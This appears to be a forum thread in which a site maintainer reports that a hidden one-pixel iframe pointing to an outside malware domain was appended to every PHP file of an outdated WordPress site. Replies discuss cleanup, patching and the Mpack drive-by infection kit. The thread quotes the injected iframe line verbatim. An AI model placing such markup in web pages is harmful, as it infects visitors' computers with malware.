Hi there, I've had a site that I help maintain get hacked. It's a strange sort of hack and luckily it doesn't seem to damaging. Might even be some type of virus installed on the server. Anyways seems to be that every single one of the .php files on the site have now the code below placed at the bottom of the file. <iframe src=http://dorzentovan.com/sp/ frameborder=0 width=1 height=1 scrolling=no></iframe> Code (markup): The site is running Wordpress Version Version 2.0 and a has alot of custom coding. I am moving the site off this server shortly - but just curious if anyone has seen this type of thing before?
do you run a virus scanner? those iframe hacks normally point to spyware, viruses or trogens which is very damaging not only to your users but to your site as google will update your sites listing with a nice warning next to it. im not familar with wordpress if it has any config files check in those for the iframe if it's there remove it and chmod the file so it's not writable.
Always keep your scripts up to date! Even if you have custom coding make sure to patch exploits that are released for your script. When you're running old versions of things like wordpress it's simply a matter of time before you're exploited. People just do searches for powered by wordpress check the exploit and move on. Quite a few exploit attempts are even done with bots so if you're in google you'll eventually be found.
- yeah the site is on a $9 a month shared host, the wordpress version is out of date, but the guy who owns the site won't pay me - so sad to say that he's on his own. Just thought it was interesting to have that type of thing happen to a website as I wasn't exactly sure how the hacker benifited from that. Thank you for the feedback.
Read this article at Pandasoftware The problem is likely non-trivial. Mpack apprarantly contains tools which help buyers locate vulnerable web servers. They are then inserting "iframe" code into the webpages, which tries to place malware on the visitor's computer. The web server probably has some kind of shell installed. In a shared hosting environment, the hacker may be able to probe around to see what else they might discover about the machine. Computers infected via the iframe become part of the botnets used to send out spam, launch DDOS attacks and so on and so on.